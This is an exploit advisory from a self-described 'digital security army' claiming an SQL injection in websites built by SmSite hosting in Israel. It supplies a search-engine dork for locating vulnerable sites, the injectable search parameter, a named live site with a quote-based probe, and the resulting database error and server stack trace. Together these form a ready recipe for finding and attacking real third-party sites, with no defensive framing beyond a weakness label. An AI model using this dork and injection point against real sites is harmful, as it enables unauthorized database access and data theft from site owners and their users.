################################################################################################# # Exploit Title : SMSITEנבנה ע״י SmSite.Co.il Hosting Israel SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 14/09/2018 # Vendor Homepage : smsite.co.il # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''SMSITEנבנה ע״י'' intext:''© כל הזכויות שמורות SMSITE'' # Exploit : /search?page=[ID-NUMBER]&cat=[SQL Injection] ################################################################################################# # Example Site => executive-israel.co.il/search?page=0&cat=1900' => [ Proof of Concept ] => archive.is/7SCBi # SQL Database Error => LINK ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 14 SQL: SELECT `mida_jobs`.`idn`, `mida_jobs`.`name`, `description`, `mida_categories`. `name` As `cat_name`, `mida_sub_categories`.`name` As `sub_name`, `mida_areas`.`name` As `area_name` FROM `mida_jobs` LEFT JOIN `mida_categories` ON `mida_jobs`.`category` = `mida_categories`.`idn` LEFT JOIN `mida_sub_categories` ON `mida_jobs`.`sub_category` = `mida_sub_categories`.`idn` LEFT JOIN `mida_areas` ON `mida_jobs`.`work_area` = `mida_areas`.`idn` WHERE 1 GROUP BY `mida_jobs`.`idn` ORDER BY `idn` Desc LIMIT -20, 20 Fatal error: Uncaught exception 'Exception' in D:\HostingSpaces\repository\php\db.inc:326 Stack trace: #0 D:\HostingSpaces\repository\php\db.inc(146): db->failure('SQL ERROR: <br...') #1 D:\HostingSpaces\repository\php\db.inc(186): db->execute('SELECT ?????`mi...') #2 D:\HostingSpaces\repository\php\db.inc(1134): db->query('SELECT ?????`mi...', true, NULL, 1) #3 D:\HostingSpaces\maof1\maof_repository\sections\search\results.inc(130): db->query_object('SELECT ?????`mi...') #4 D:\HostingSpaces\maof1\maof_repository\search.inc(240): require('D:\HostingSpace...') #5 D:\HostingSpaces\maof1\maof_repository\index.inc(33): require('D:\HostingSpace...') #6 D:\HostingSpaces\maof3\executive-israel.co.il\wwwroot\index.php(101): require('D:\HostingSpace...') #7 {main} thrown in D:\HostingSpaces\repository\php\db.inc on line 326 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################